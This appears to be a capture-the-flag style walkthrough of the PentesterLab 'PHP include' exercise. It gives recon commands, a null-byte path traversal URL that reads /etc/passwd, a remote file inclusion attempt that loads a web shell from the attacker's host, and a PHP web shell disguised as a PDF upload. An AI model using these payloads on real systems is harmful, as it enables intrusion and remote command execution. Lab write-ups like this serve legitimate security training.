pentesterlab-PHP-include

Tools:

  • netdiscover
  • Nmap
  • Nikto
  • Wfuzz
  • Netcat

Use netdiscover to find the target's IP address:

netdiscover -i eth0 -r 192.168.79.0/24

192.168.79.188 is the target.

Then run nmap to find open ports and running services on the target machine:

nmap -sV -v -O -A -T5 192.168.79.184 -p-

Only port 80 is open.

Use Wfuzz to scan for directories and files:

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 http://192.168.79.188/FUZZ 2>/dev/null

Use Nikto to scan:

nikto -h 192.168.79.188

Looks like there is a PHP include vulnerability.

Let's confirm it:

http://192.168.79.188/index.php?page=fgfgfgf

http://192.168.79.188/index.php?page=../../../../../../../../../../etc/passwd%00

(The %00 after /etc/passwd is there because the PHP code appends a .php suffix to the parameter, so a null byte is needed to truncate the path and get rid of it.)

I tried to exploit remote file inclusion:

http://192.168.79.188/index.php?page=http://192.168.79.173/webshell.txt&cmd=ifconfig

Doesn’t work.

Examining the web page, I find that I can upload a PDF file to the server. I tried just renaming webshell.txt to webshell.pdf and the server doesn't accept it. I guess the server validates the PDF file format. So I create a crafted PDF file:

webshell.pdf

%PDF-1.4
<?php
  system($_GET["cmd"]);
?>

Upload it. Works.

Now try to visit it after logging in.

Try to verify the webshell:

Looks good.

Set up a Netcat listener on my Kali box and run the command on the server:

And get the shell:

DONE